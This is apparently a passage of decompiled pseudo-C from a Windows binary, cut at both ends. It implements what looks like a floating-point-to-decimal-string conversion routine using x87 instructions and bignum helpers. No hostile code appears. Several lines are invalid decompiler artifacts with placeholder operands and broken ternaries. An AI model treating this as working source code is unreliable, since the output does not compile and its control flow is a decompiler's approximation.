						_t52 = __eax - 1; // 0xf
						__edx = _t52;
						__esp[0xc] = _t52;
						__edx = __esp[4];
						__eflags = __edx - 0x16;
						if(__eflags > 0) {
							__esp[0x13] = 1;
							goto L28;
						} else {
							__fp0 =  *(0x14acd80 + __edx * 8);
							asm("fst qword [esp+0x28]");
							__fp0 = __esp[8];
							asm("fxch st0, st1");
							asm("fcomip st0, st1");
							st0 = __fp0;
							if(__eflags <= 0) {
								__edx = __esp[0xc];
								__esp[0x13] = 0;
								__esp[0x10] = 0;
								__eflags = __esp[0xc];
								if(__esp[0xc] < 0) {
									goto L101;
								} else {
									goto L62;
								}
								goto L301;
							} else {
								__edx = __edx - 1;
								__esp[0x13] = 0;
								__esp[4] = __edx;
								L28:
								__edx = __esp[0xc];
								__esp[0x10] = 0;
								__eflags = __esp[0xc];
								if(__esp[0xc] < 0) {
									L101:
									__edx = 1;
									__esp[0xc] = 0;
									__edx = 1 - __eax;
									__esp[0x10] = 1 - __eax;
								}
								__eax = __esp[4];
								__eflags = __esp[4];
								if(__esp[4] >= 0) {
									L62:
									__ecx = __esp[4];
									__esp[0x12] = 0;
									__esp[0xc] = __esp[0xc] + __ecx;
									__esp[0x11] = __ecx;
								} else {
									__eax = __esp[4];
									_t70 =  &(__esp[0x10]);
									 *_t70 = __esp[0x10] - __eax;
									__eflags =  *_t70;
									__esp[4] = 0;
									__ecx = __eax;
									__esp[0x11] = __eax;
									__ecx =  ~__eax;
									__esp[0x12] =  ~__eax;
								}
							}
						}
						__eflags = __esp[0x2c] - 9;
						if(__esp[0x2c] > 9) {
							__esp[0x2c] = 0;
							goto L64;
						} else {
							__eflags = __esp[0x2c] - 5;
							if(__esp[0x2c] > 5) {
								__esp[0x2c] = __esp[0x2c] - 4;
								__esp[0x14] = 0;
							} else {
								__eax = __esp[7];
								__eax = __esp[7] + 0x3fd;
								__eflags = __eax - 0x7f7;
								_t79 = __eax - 0x7f7 < 0;
								__eflags = _t79;
								__eax = __al & 0x000000ff;
								__esp[0x14] = __al & 0x000000ff;
							}
							__eflags = __esp[0x2c] - 3;
							if(__eflags == 0) {
								__esp[0xf] = 0;
								goto L127;
							} else {
								if(__eflags <= 0) {
									__eflags = __esp[0x2c] - 2;
									if(__esp[0x2c] != 2) {
										goto L64;
									} else {
										__esp[0xf] = 0;
										goto L38;
									}
								} else {
									__eflags = __esp[0x2c] - 4;
									if(__esp[0x2c] != 4) {
										__eflags = __esp[0x2c] - 5;
										if(__esp[0x2c] != 5) {
											L64:
											__esp[7] = __ebp;
											asm("fild dword [esp+0x1c]");
											__fp0 = __fp0 *  *0x14acd18;
											asm("fldcw word [esp+0x6c]");
											asm("fistp dword [esp+0x68]");
											asm("fldcw word [esp+0x6e]");
											__eax = __esp[0x1a];
											__eax = __esp[0x1a] + 3;
											 *__esp = __eax;
											__esp[0x1f] = __eax;
											__esp[0xd] = E013E01F0();
											__eax = __esp[0x28];
											__eax =  *(__esp[0x28] + 0xc);
											__esp[7] = __eax;
											__eax = __eax - 1;
											__eflags = __eax;
											__esp[0xa] = __eax;
											if(__eax != 0) {
												__esp[0x14] = 0;
												__esp[0xf] = 1;
												__esp[0x15] = 0xffffffff;
												__esp[7] = 0xffffffff;
												__esp[0x2d] = 0;
												goto L40;
											} else {
												__edi = __esp[0xe];
												__eflags = __edi;
												if(__edi < 0) {
													__ecx = __esp[0x28];
													__eax = __ebp;
													__esp[0x2d] = 0;
													__eax = __ebp - __esi;
													__esp[0x15] = 0xffffffff;
													__ecx =  *(__esp[0x28] + 4);
													__edx = __eax + 1;
													__edi = __edi - __eax;
													__esp[7] = 0xffffffff;
													__esp[0x1f] = __edx;
													__eflags = __ecx - __edi;
													if(__ecx > __edi) {
														goto L69;
													} else {
														goto L206;
													}
												} else {
													__eax = __esp[0x28];
													__edi = __esp[0x11];
													__eflags =  *((intOrPtr*)(__eax + 0x14)) - __esp[0x11];
													if( *((intOrPtr*)(__eax + 0x14)) >= __esp[0x11]) {
														__eax = __esp[0x11];
														__esp[7] = 0xffffffff;
														__fp0 =  *(0x14acd80 + __esp[0x11] * 8);
														goto L190;
													} else {
														__esp[0x2d] = 0;
														__esp[7] = 0xffffffff;
														__esp[0x15] = 0xffffffff;
														goto L68;
													}
												}
											}
										} else {
											__esp[0xf] = 1;
											L127:
											__eax = __esp[0x11];
											__eax = __esp[0x11] + __esp[0x2d];
											__esp[0x15] = __eax;
											__eax = __eax + 1;
											__esp[7] = __eax;
											__eflags = __eax;
											if(__eax <= 0) {
												__esp[0x1f] = 1;
												__eax = 1;
											} else {
												__esp[0x1f] = __eax;
											}
											goto L39;
										}
									} else {
										__esp[0xf] = 1;
										L38:
										__eax = __esp[0x2d];
										__eflags = __esp[0x2d];
										1 =  >  ? __esp[0x2d] : 1;
										__esp[0x2d] = 1;
										__esp[0x1f] = 1;
										__esp[0x15] = 1;
										__esp[7] = 1;
										L39:
										__eax = E013E01F0(__eax);
										__eflags = __esp[7] - 0xe;
										__esp[0xd] = __eax;
										__eax = __esp[0x28];
										__eax =  *(__esp[0x28] + 0xc);
										__esp[0xa] = __eax;
										__eax = __eax & 0xffffff00 | __esp[7] - 0x0000000e < 0x00000000;
										__al = __al & __esp[0x14];
										__esp[0x14] = __al;
										__eax = __esp[0xa];
										__eax = __esp[0xa] - 1;
										__eflags = __eax;
										__esp[0xa] = __eax;
										if(__eax == 0) {
											L42:
											__eflags = __esp[0x14];
											if(__esp[0x14] == 0) {
												goto L116;
											} else {
												__ecx = __esp[0xa];
												__ecx = __esp[0xa] | __esp[0x11];
												__eflags = __ecx;
												if(__ecx != 0) {
													goto L116;
												} else {
													__eax = __esp[0x13];
													__fp0 = __esp[8];
													__esp[0x1f] = 0;
													__eflags = __esp[0x13];
													if(__eflags == 0) {
														L46:
														st0 = st0 + st1;
														__fp0 = st0 + st1 +  *0x14acd2c;
														__esp[0xa] = __fp0;
														__eax = __esp[0xa];
														__edx = __esp[0xb];
														__esp[0xb] = __esp[0xb] - 0x3400000;
														__esp[0xb] = __esp[0xb] - 0x3400000;
														__eax = __esp[7];
														__eflags = __esp[7];
														if(__eflags == 0) {
															goto L108;
														} else {
															__eax = __esp[7];
															__esp[0x17] = 0;
															__esp[0x16] = __esp[7];
															goto L48;
														}
													} else {
														asm("fld1");
														asm("fcomip st0, st1");
														if(__eflags > 0) {
															__eax = __esp[7];
															__eflags = __esp[7];
															if(__esp[7] == 0) {
																st0 = st0 + st1;
																__fp0 = st0 + st1 +  *0x14acd2c;
																__esp[0xa] = __fp0;
																__eax = __esp[0xa];
																__edx = __esp[0xb];
																__eax = __esp[0xb];
																__eax = __esp[0xb] - 0x3400000;
																__eflags = __eax;
																__esp[0xb] = __eax;
																L108:
																__fp0 = __fp0 -  *0x14acd30;
																__fp0 = __esp[0xa];
																asm("fxch st0, st1");
																asm("fcomi st0, st1");
																if(__eflags > 0) {
																	st0 = __fp0;
																	st0 = __fp0;
																	__eax = __esp[0xd];
																	__esp[0xe] = 2;
																	__edi = 0;
																	__ebp = 0;
																	goto L95;
																} else {
																	asm("fxch st0, st1");
																	asm("fchs");
																	asm("fcomip st0, st1");
																	st0 = __fp0;
																	if(__eflags > 0) {
																		goto L132;
																	} else {
																		goto L115;
																	}
																}
															} else {
																__edi = __esp[0x15];
																__eflags = __edi;
																if(__edi <= 0) {
																	st0 = __fp0;
																	goto L115;
																} else {
																	__fp0 = __fp0 *  *0x14acd24;
																	__esp[0x16] = __edi;
																	__esp[0x17] = 0xffffffff;
																	st0 = st0 *  *0x14acd28;
																	__fp0 = st0 *  *0x14acd28 +  *0x14acd2c;
																	__esp[0xa] = st0 *  *0x14acd28 +  *0x14acd2c;
																	__eax = __esp[0xa];
																	__edx = __esp[0xb];
																	__esp[0xb] = __esp[0xb] - 0x3400000;
																	__esp[0xb] = __esp[0xb] - 0x3400000;
																	L48:
																	__eax = __esp[0x16];
																	__fp0 = __esp[0xa];
																	__fp0 =  *(0x14acd78 + __esp[0x16] * 8);
																	__eax = __esp[0xf];
																	__eflags = __esp[0xf];
																	if(__esp[0xf] == 0) {
																		asm("fnstcw word [esp+0x6e]");
																		asm("fmulp st1, st0");
																		__esp[0x18] = __ebx;
																		__ecx = __esp[0xd];
																		__esp[0x19] = __ebp;
																		__edi = 0;
																		__ebp = __esp[0x16];
																		__eax = __esp[0x1b] & 0x0000ffff;
																		__esp[0x1f] = 1;
																		__ebx = __esp[0x14] & 0x000000ff;
																		__ah = __ah | 0x0000000c;
																		__fp0 = st1;
																		__esp[0x1b] = __ax;
																		while(1) {
																			asm("fldcw word [esp+0x6c]");
																			asm("fist dword [esp+0x68]");
																			asm("fldcw word [esp+0x6e]");
																			__edx = __esp[0x1a];
																			__eflags = __edx;
																			if(__edx != 0) {
																				__esp[0xa] = __edx;
																				asm("fild dword [esp+0x28]");
																				__edi = __ebx;
																				asm("fsubp st1, st0");
																			}
																			__ecx = __ecx + 1;
																			__edx = __edx + 0x30;
																			 *(__ecx - 1) = __dl;
																			__eax = __esp[0x1f];
																			__eflags = __eax - __ebp;
																			if(__eax == __ebp) {
																				break;
																			}
																			__eax = __eax + 1;
																			__eflags = __eax;
																			__fp0 = __fp0 *  *0x14acd24;
																			__edi = __ebx;
																			__esp[0x1f] = __eax;
																		}
																		__eax = __edi;
																		__ebx = __esp[0x18];
																		__ebp = __esp[0x19];
																		__eflags = __al;
																		asm("fcmove st0, st2");
																		st2 = __fp0;
																		 *0x14acd34 = st1;
																		__fp0 = st1 + st1;
																		asm("fxch st0, st3");
																		asm("fcomi st0, st3");
																		st3 = __fp0;
																		if(__eflags > 0) {
																			st0 = __fp0;
																			st0 = __fp0;
																			st0 = __fp0;
																			__eax = __esp[0x17];
																			__esi = __ecx;
																			__eax = __esp[0x17] + 1;
																			__eflags = __eax;
																			__esp[0xe] = __eax;
																			__eax = __esp[0xd];
																			goto L264;
																		} else {
																			asm("fsubrp st1, st0");
																			asm("fcomip st0, st1");
																			if(__eflags <= 0) {
																				st0 = __fp0;
																				goto L115;
																			} else {
																				asm("fldz");
																				asm("fxch st0, st1");
																				__eax = __esp[0xd];
																				__edx = __ecx;
																				asm("fucomip st0, st1");
																				st0 = __fp0;
																				if(__eflags != 0 || __eflags != 0) {
																					__edi = __esp[0x17];
																					__ecx = 0x10;
																					_t497 = __edi + 1; // 0x1
																					__esi = _t497;
																				} else {
																					__edi = __esp[0x17];
																					__ecx = 0;
																					_t634 = __edi + 1; // 0x1
																					__esi = _t634;
																				}
																				goto L230;
																			}
																		}
																	} else {
																		asm("fxch st0, st2");
																		asm("fnstcw word [esp+0x6e]");
																		__eax = __esp[0xd];
																		__edi = __esp[0xd] + 1;
																		__eax = __esp[0x1b] & 0x0000ffff;
																		__ah = __ah | 0x0000000c;
																		__eflags = __ah;
																		__esp[0x1b] = __ax;
																		asm("fldcw word [esp+0x6c]");
																		asm("fist dword [esp+0x68]");
																		asm("fldcw word [esp+0x6e]");
																		asm("fxch st0, st2");
																		asm("fdivr dword [0x14acd34]");
																		__eax = __esp[0x1a];
																		__esp[0xa] = __eax;
																		__edx = __eax + 0x30;
																		__eax = __esp[0xd];
																		 *(__esp[0xd]) = __dl;
																		asm("fsubrp st1, st0");
																		asm("fild dword [esp+0x28]");
																		asm("fsubp st2, st0");
																		asm("fcomi st0, st1");
																		if(__eflags > 0) {
																			st0 = __fp0;
																			goto L58;
																		} else {
																			__fp0 = st1;
																			asm("fsubr dword [0x14acd20]");
																			asm("fxch st0, st1");
																			asm("fcomi st0, st1");
																			st1 = __fp0;
																			if(__eflags > 0) {
																				st0 = __fp0;
																				st0 = __fp0;
																				goto L278;
																			} else {
																				__eax = __esp[0x1f];
																				__eax = __esp[0x1f] + 1;
																				__esp[0x1f] = __eax;
																				__eflags = __eax - __esp[0x16];
																				if(__eax >= __esp[0x16]) {
																					st0 = __fp0;
																					st0 = __fp0;
																					goto L115;
																				} else {
																					__eax = __esp[0x16];
																					while(1) {
																						__fp0 =  *0x14acd24;
																						__edi = __edi + 1;
																						__fp0 =  *0x14acd24 * st0;
																						asm("fmulp st2, st0");
																						asm("fxch st0, st1");
																						asm("fldcw word [esp+0x6c]");
																						asm("fist dword [esp+0x28]");
																						asm("fldcw word [esp+0x6e]");
																						asm("fild dword [esp+0x28]");
																						__edx = __esp[0xa] & 0x000000ff;
																						__edx = (__esp[0xa] & 0x000000ff) + 0x30;
																						__eflags = __edx;
																						asm("fsubp st1, st0");
																						asm("fxch st0, st1");
																						 *(__edi - 1) = __dl;
																						asm("fcomi st0, st1");
																						if(__eflags > 0) {
																							break;
																						}
																						__fp0 = st1;
																						asm("fsubr dword [0x14acd20]");
																						asm("fxch st0, st1");
																						asm("fcomi st0, st1");
																						st1 = __fp0;
																						if(__eflags > 0) {
																							st0 = __fp0;
																							st0 = __fp0;
																							L278:
																							__eax = __esp[0x17];
																							__esi = __edi;
																							__eax = __esp[0x17] + 1;
																							__esp[0xe] = __esp[0x17] + 1;
																							__eax = __esp[0xd];
																							goto L264;
																						} else {
																							__edx = __esp[0x1f];
																							__edx = __esp[0x1f] + 1;
																							__esp[0x1f] = __edx;
																							__eflags = __edx - __eax;
																							if(__edx >= __eax) {
																								st0 = __fp0;
																								st0 = __fp0;
																								L115:
																								__esp[0xa] = 0;
																								goto L116;
																							} else {
																								continue;
																							}
																						}
																						goto L98;
																					}
																					st0 = __fp0;
																					L58:
																					__eax = __esp[0x17];
																					asm("fldz");
																					asm("fxch st0, st1");
																					__eax = __esp[0x17] + 1;
																					__eflags = __eax;
																					asm("fucomip st0, st1");
																					st0 = __fp0;
																					__esp[0xe] = __eax;
																					__eax = __esp[0xd];
																					__esp[0xd] = __edi;
																					if(__eflags != 0 || __eflags != 0) {
																						goto L60;
																					}
																				}
																			}
																		}
																	}
																}
															}
														} else {
															goto L46;
														}
													}
												}
											}
										} else {
											L40:
											__ecx = __esp[0xa];
											__eax = 2;
											__eflags = __ecx;
											__eax =  >=  ? __ecx : 2;
											__edi = __edi & 0x00000008;
											__eflags = __edi;
											__edx = 2;
											__esp[0xa] =  >=  ? __ecx : 2;
											if(__edi == 0) {
												L116:
												__edi = __esp[0xe];
												__eflags = __esp[0xe];
												if(__esp[0xe] < 0) {
													L129:
													__edx = __esp[0xf];
													__eflags = __esp[0xf];
													if(__esp[0xf] != 0) {
														L68:
														__edi = __esp[0x28];
														__eax = __ebp;
														__eax = __ebp - __esi;
														__ecx =  *(__esp[0x28] + 4);
														__edi = __esp[0xe];
														__edx = __eax + 1;
														__esp[0x1f] = __edx;
														__edi = __esp[0xe] - __eax;
														__eflags = __esp[0xe] - __eax - __ecx;
														if(__esp[0xe] - __eax >= __ecx) {
															L164:
															__eflags = __esp[0x2c] - 1;
															if(__esp[0x2c] <= 1) {
																L206:
																__eax = __esp[0x10];
																__esp[0xc] = __esp[0xc] + __edx;
																__edi = __esp[0x12];
																__esp[8] = __eax;
																__esp[0x10] = __eax;
																goto L73;
															} else {
																goto L165;
															}
															goto L98;
														} else {
															L69:
															__esp[0x2c] = __esp[0x2c] - 3;
															__eax = __esp[0x2c] - 0x00000003 & 0xfffffffd;
															__eflags = __esp[0x2c] - 0x00000003 & 0xfffffffd;
															if((__esp[0x2c] - 0x00000003 & 0xfffffffd) == 0) {
																goto L164;
															} else {
																__eax = __esp[0xe];
																__edi = __esp[7];
																__eax = __esp[0xe] - __ecx;
																__eax = __esp[0xe] - __ecx + 1;
																__eflags = __esp[0x2c] - 1;
																__ecx = __ecx & 0xffffff00 | __esp[0x2c] - 0x00000001 > 0x00000000;
																__eflags = __edi;
																__esp[0x1f] = __eax;
																__edx = __edx & 0xffffff00 | __edi > 0x00000000;
																__eflags = __cl & __dl;
																if((__cl & __dl) == 0) {
																	L72:
																	__edx = __esp[0x10];
																	__esp[0xc] = __esp[0xc] + __eax;
																	__edi = __esp[0x12];
																	__eax = __eax + __edx;
																	__eflags = __eax;
																	__esp[8] = __edx;
																	__esp[0x10] = __eax;
																} else {
																	__eflags = __eax - __edi;
																	if(__eax > __edi) {
																		L165:
																		__eax = __esp[7];
																		__edi = __esp[0x12];
																		__eax = __esp[7] - 1;
																		__eflags = __edi - __eax;
																		if(__edi < __eax) {
																			__edx = __eax;
																			__edi = 0;
																			__edx = __eax - __esp[0x12];
																			__esp[0x12] = __eax;
																			__esp[4] = __esp[4] + __eax - __esp[0x12];
																		} else {
																			__edi = __edi - __eax;
																			__eflags = __edi;
																		}
																		__eax = __esp[7];
																		__eflags = __eax;
																		if(__eax < 0) {
																			__esp[0x10] = __esp[0x10] - __esp[7];
																			__esp[0x1f] = 0;
																			__esp[8] = __esp[0x10] - __esp[7];
																		} else {
																			__edx = __esp[0x10];
																			__esp[0x1f] = __eax;
																			__esp[0xc] = __esp[0xc] + __eax;
																			__eax = __eax + __edx;
																			__esp[8] = __edx;
																			__esp[0x10] = __eax;
																		}
																	} else {
																		goto L72;
																	}
																}
															}
														}
														L73:
														__eax = E013E2F00(1);
														__esp[0xf] = 1;
														__ebp = __eax;
														goto L74;
													} else {
														__eax = __esp[0x10];
														__edi = __esp[0x12];
														__ebp = 0;
														__esp[8] = __esp[0x10];
														L74:
														__ecx = __esp[8];
														__eflags = __ecx;
														if(__ecx > 0) {
															__edx = __esp[0xc];
															__eflags = __edx;
															if(__edx > 0) {
																__eflags = __ecx - __edx;
																__eax = __edx;
																__eax =  <=  ? __ecx : __edx;
																__esp[0x10] = __esp[0x10] - __eax;
																__ecx = __ecx - __eax;
																__edx = __edx - __eax;
																__eflags = __edx;
																__esp[0x1f] = __eax;
																__esp[8] = __ecx;
																__esp[0xc] = __edx;
															}
														}
														__eax = __esp[0x12];
														__eflags = __esp[0x12];
														if(__esp[0x12] != 0) {
															__eax = __esp[0xf];
															__eflags = __esp[0xf];
															if(__esp[0xf] == 0) {
																__eax = __esp[0x12];
																goto L186;
															} else {
																__eflags = __edi;
																if(__edi > 0) {
																	__eax = E013E30B0(__ebp, __edi);
																	__esp[1] = __ebx;
																	 *__esp = __eax;
																	__ebp = __eax;
																	__eax = E013E2F30();
																	 *__esp = __ebx;
																	__esp[0xe] = __eax;
																	E013E2DC0() = __esp[0xe];
																	__ebx = __esp[0xe];
																}
																__eax = __esp[0x12];
																__eax = __esp[0x12] - __edi;
																__eflags = __eax;
																if(__eax != 0) {
																	L186:
																	__ebx = __eax;
																}
															}
														}
														__eax = E013E2F00(1);
														__eflags = __esi - 1;
														__edx = __edx & 0xffffff00 | __esi == 0x00000001;
														__eflags = __esp[0x2c] - 1;
														__edi = __eax;
														__esi = __edx;
														__esi = __edx & __eax;
														__eax = __esp[4];
														__eflags = __eax;
														if(__eax > 0) {
															__edi = __eax;
															__eax = __esi;
															__eflags = __al;
															if(__al != 0) {
																__eax = __esp[0x28];
																__eax =  *(__esp[0x28] + 4);
																__eax =  *(__esp[0x28] + 4) + 1;
																__eflags = __esp[0x29] - __eax;
																if(__esp[0x29] <= __eax) {
																	goto L135;
																} else {
																	goto L247;
																}
															} else {
																L135:
																__esp[0x12] = 0;
																goto L136;
															}
															goto L301;
														} else {
															__eax = __esi;
															__esp[0x12] = 0;
															__eflags = __al;
															if(__al != 0) {
																__eax = __esp[0x28];
																__eax =  *(__esp[0x28] + 4);
																__eax =  *(__esp[0x28] + 4) + 1;
																__eflags = __eax - __esp[0x29];
																if(__eax < __esp[0x29]) {
																	L247:
																	__esp[0x10] = __esp[0x10] + 1;
																	__esp[0xc] = __esp[0xc] + 1;
																	__esp[0x12] = 1;
																}
															}
															__eax = __esp[4];
															__esi = 0x1f;
															__eflags = __esp[4];
															if(__esp[4] != 0) {
																L136:
																__eax =  *(__edi + 0x10);
																asm("bsr esi, [edi+eax*4+0x10]");
																__esi = __esi ^ 0x0000001f;
															}
														}
														__esi = __esi - __esp[0xc];
														__edx = __esp[0x10];
														__esi = __esi - 4;
														__esi = __esi & 0x0000001f;
														__edx = __esp[0x10] + __esi;
														__esp[0x1f] = __esi;
														__eax = __esi;
														__eflags = __edx;
														if(__edx > 0) {
															 *__esp = __ebx;
															__esp[1] = __edx;
															__ebx = E013E3230();
															__eax = __esp[0x1f];
														}
														__eax = __eax + __esp[0xc];
														__eflags = __eax;
														if(__eax > 0) {
															 *__esp = __edi;
															__esp[1] = __eax;
															__edi = E013E3230();
														}
														__eax = __esp[0x13];
														__eflags = __esp[0x2c] - 2;
														__edx = __edx & 0xffffff00 | __esp[0x2c] - 0x00000002 > 0x00000000;
														__eflags = __esp[0x13];
														if(__esp[0x13] != 0) {
															__esp[1] = __edi;
															 *__esp = __ebx;
															__esp[4] = __dl;
															__eax = E013E3340();
															__edx = __esp[4] & 0x000000ff;
															__eflags = __eax;
															if(__eax >= 0) {
																goto L90;
															} else {
																__eax = __esp[0x11];
																 *__esp = __ebx;
																__esp[2] = 0;
																__esp[1] = 0xa;
																__eax = __esp[0x11] - 1;
																__esp[7] = __esp[0x11] - 1;
																__eax = E013E2E20();
																__edx = __esp[4] & 0x000000ff;
																__ebx = __eax;
																__eax = __esp[0x15];
																__eflags = __eax;
																__edx = __esp[4] & 0x000000ff & __eax;
																__eax = __esp[0xf];
																__eflags = __esp[0xf];
																if(__esp[0xf] != 0) {
																	 *__esp = __ebp;
																	__esp[2] = 0;
																	__esp[1] = 0xa;
																	__esp[4] = __dl;
																	__eax = E013E2E20();
																	__edx = __esp[4] & 0x000000ff;
																	__ebp = __eax;
																	__eflags = __dl;
																	if(__dl != 0) {
																		goto L261;
																	} else {
																		__eax = __esp[0x11];
																		__esp[0xe] = __esp[0x11];
																		__eax = __esp[0x15];
																		__esp[7] = __esp[0x15];
																		goto L138;
																	}
																} else {
																	__eflags = __dl;
																	if(__dl != 0) {
																		L261:
																		__eax = __esp[7];
																		__esp[0x11] = __esp[7];
																		__eax = __esp[0x15];
																		__esp[7] = __esp[0x15];
																		goto L92;
																	} else {
																		__eax = __esp[0x11];
																		__esp[0xe] = __esp[0x11];
																		__eax = __esp[0x15];
																		__esp[7] = __esp[0x15];
																		goto L173;
																	}
																}
															}
														} else {
															L90:
															__ecx = __esp[7];
															__eflags = __esp[7];
															if(__esp[7] > 0) {
																L137:
																__esp[0x11] = __esp[0x11] + 1;
																__esp[0xe] = __esp[0x11] + 1;
																__eax = __esp[0xf];
																__eflags = __esp[0xf];
																if(__esp[0xf] == 0) {
																	L173:
																	__esp[0xc] = __ebp;
																	__esi = __esp[0xd];
																	__ebp = __ebx;
																	__esp[0x1f] = 1;
																	__ebx = __esp[7];
																	while(1) {
																		__esp[1] = __edi;
																		__esi = __esi + 1;
																		 *__esp = __ebp;
																		__eax = E013E02D0();
																		__eax = __eax + 0x30;
																		 *(__esi - 1) = __al;
																		__eflags = __esp[0x1f] - __ebx;
																		if(__esp[0x1f] >= __ebx) {
																			break;
																		}
																		__eax = E013E2E20(__ebp, 0xa, 0);
																		_t400 =  &(__esp[0x1f]);
																		 *_t400 = __esp[0x1f] + 1;
																		__eflags =  *_t400;
																		__ebp = __eax;
																	}
																	__esp[4] = __eax;
																	__ebx = __ebp;
																	__ebp = __esp[0xc];
																	__esp[7] = 0;
																	goto L177;
																} else {
																	L138:
																	__esi = __esi + __esp[8];
																	__eflags = __esi;
																	if(__esi > 0) {
																		 *__esp = __ebp;
																		__esp[1] = __esi;
																		__ebp = E013E3230();
																	}
																	__eax = __esp[0x12];
																	__esp[0x10] = __ebp;
																	__eflags = __esp[0x12];
																	if(__esp[0x12] != 0) {
																		__eax =  *(__ebp + 4);
																		__eax = E013E2CD0( *(__ebp + 4));
																		_t546 = __eax + 0xc; // 0xc
																		__ecx = _t546;
																		__esi = __eax;
																		__eax =  *(__ebp + 0x10);
																		 *__esp = _t546;
																		__edx = 8 +  *(__ebp + 0x10) * 4;
																		_t550 = __ebp + 0xc; // 0xc
																		__eax = _t550;
																		__esp[2] = 8 +  *(__ebp + 0x10) * 4;
																		__esp[1] = _t550;
																		__eax = memcpy(??, ??, ??);
																		__esp[1] = 1;
																		 *__esp = __esi;
																		__esp[0x10] = E013E3230();
																	}
																	__eax = __esp[0xd];
																	__esp[0xc] = __edi;
																	__esp[0x1f] = 1;
																	__edi = __esp[0x10];
																	__esp[8] = __esp[0xd];
																	while(1) {
																		__eax = __esp[0xc];
																		 *__esp = __ebx;
																		__esp[1] = __esp[0xc];
																		__eax = E013E02D0();
																		__esp[1] = __ebp;
																		 *__esp = __ebx;
																		_t336 = __eax + 0x30; // 0x30
																		__edx = _t336;
																		__esp[4] = _t336;
																		__esp[0xf] = __eax;
																		__eax = E013E3340();
																		__esp[1] = __edi;
																		__esi = __eax;
																		__eax = __esp[0xc];
																		 *__esp = __esp[0xc];
																		__eax = E013E3390();
																		__edx = __eax;
																		__eax =  *(__eax + 0xc);
																		__eflags = __eax;
																		if(__eax != 0) {
																			goto L142;
																		}
																		__esp[1] = __edx;
																		 *__esp = __ebx;
																		__esp[0x11] = __edx;
																		__eax = E013E3340();
																		__edx = __esp[0x11];
																		__esp[0x10] = __eax;
																		__eax = E013E2DC0(__esp[0x11]);
																		__eax = __esp[0x10];
																		__ecx = __eax;
																		__ecx = __eax | __esp[0x2c];
																		__eflags = __ecx;
																		if(__ecx != 0) {
																			__ecx = __eax;
																			goto L143;
																		} else {
																			__eax = __esp[0x2a];
																			__eax =  *(__esp[0x2a]);
																			__esp[0x10] = __eax;
																			__eax = __eax & 0x00000001;
																			__eax = __eax | __esp[0xa];
																			__eflags = __eax;
																			if(__eax != 0) {
																				L143:
																				__eflags = __esi;
																				if(__esi < 0) {
																					L232:
																					__eax = __esp[8];
																					__esp[0x10] = __edi;
																					__edi = __esp[0xc];
																					__edx = __esp[8] + 1;
																					__eax = __esp[0xa];
																					__esi = __edx;
																					__eflags = __esp[0xa];
																					if(__esp[0xa] == 0) {
																						__eflags = __ecx;
																						if(__ecx <= 0) {
																							goto L258;
																						} else {
																							goto L255;
																						}
																					} else {
																						__eflags =  *(__ebx + 0x10) - 1;
																						if( *(__ebx + 0x10) <= 1) {
																							__eax =  *(__ebx + 0x14);
																							__eflags =  *(__ebx + 0x14);
																							if( *(__ebx + 0x14) != 0) {
																								goto L234;
																							} else {
																								__eflags = __ecx;
																								if(__ecx > 0) {
																									L255:
																									 *__esp = __ebx;
																									__esp[1] = 1;
																									__eax = E013E3230();
																									__esp[1] = __edi;
																									 *__esp = __eax;
																									__ebx = __eax;
																									__eflags = E013E3340();
																									if(__eflags <= 0) {
																										if(__eflags != 0) {
																											L290:
																											__esp[0xa] = 0x20;
																											goto L258;
																										} else {
																											__eflags = __esp[4] & 0x00000001;
																											if((__esp[4] & 0x00000001) != 0) {
																												goto L256;
																											} else {
																												goto L290;
																											}
																										}
																									} else {
																										L256:
																										__eflags = __esp[4] - 0x39;
																										if(__esp[4] == 0x39) {
																											goto L260;
																										} else {
																											__eax = __esp[0xf];
																											__esp[0xa] = 0x20;
																											__eax = __esp[0xf] + 0x31;
																											__eflags = __eax;
																											__esp[4] = __eax;
																											L258:
																											__eflags =  *(__ebx + 0x10) - 1;
																											if( *(__ebx + 0x10) <= 1) {
																												__ecx =  *(__ebx + 0x14);
																												__esp[7] = __ebp;
																												__ebp = __esp[0x10];
																												__eflags =  *(__ebx + 0x14);
																												if( *(__ebx + 0x14) == 0) {
																													__ecx = __esp[0xa];
																												} else {
																													__ecx = 0x10;
																												}
																											} else {
																												goto L259;
																											}
																											goto L240;
																										}
																									}
																								} else {
																									__esp[7] = __ebp;
																									__ecx = 0;
																									__ebp = __esp[0x10];
																									goto L240;
																								}
																							}
																						} else {
																							L234:
																							__eflags = __esp[0xa] - 2;
																							if(__esp[0xa] == 2) {
																								L259:
																								__esp[7] = __ebp;
																								__ecx = 0x10;
																								__ebp = __esp[0x10];
																								goto L240;
																							} else {
																								__esi = __ebx;
																								__esp[7] = __edi;
																								__ebx = __edx;
																								__edi = __esp[0x10];
																								while(1) {
																									__eax = __esp[7];
																									__eax = E013E3340(__esp[7], __edi);
																									__ecx = __ebx;
																									__eflags = __eax;
																									if(__eax <= 0) {
																										break;
																									}
																									__eax = __esp[4] & 0x000000ff;
																									 *(__ebx - 1) = __al;
																									__eax = E013E2E20(__edi, 0xa, 0);
																									 *__esp = __esi;
																									__eflags = __ebp - __edi;
																									__esp[2] = 0;
																									__ebp =  ==  ? __eax : __ebp;
																									__esp[1] = 0xa;
																									__esp[0xc] = __eax;
																									__esi = E013E2E20();
																									__eax = __esp[7];
																									 *__esp = __esi;
																									__esp[1] = __esp[7];
																									__eax = E013E02D0();
																									__ecx = __esp[0xc];
																									__esp[8] = __ebx;
																									__ebx = __ebx + 1;
																									__eax = __eax + 0x30;
																									__eflags = __eax;
																									__esp[4] = __eax;
																									__edi = __esp[0xc];
																								}
																								__eax = __esp[4];
																								__ebx = __esi;
																								__edx = __edi;
																								__esp[0x10] = __edi;
																								__esi = __ecx;
																								__edi = __esp[7];
																								__eflags = __eax - 0x39;
																								if(__eax == 0x39) {
																									goto L260;
																								} else {
																									__eax = __eax + 1;
																									__eflags = __eax;
																									__esp[7] = __ebp;
																									__ecx = 0x20;
																									__ebp = __edx;
																									__esp[4] = __eax;
																									L240:
																									__edx = __esp[8];
																									__eax = __esp[4] & 0x000000ff;
																									 *(__esp[8]) = __al;
																								}
																							}
																						}
																					}
																				} else {
																					__esi = __esi | __esp[0x2c];
																					__eflags = __esi;
																					if(__esi != 0) {
																						L146:
																						__eax = __esp[8];
																						__esi = __esp[8] + 1;
																						__eflags = __ecx;
																						if(__ecx <= 0) {
																							L148:
																							__eax = __esp[4] & 0x000000ff;
																							 *(__esi - 1) = __al;
																							__eax = __esp[7];
																							__eflags = __esp[0x1f] - __esp[7];
																							if(__esp[0x1f] == __esp[7]) {
																								__eax = __edi;
																								__esp[7] = __ebp;
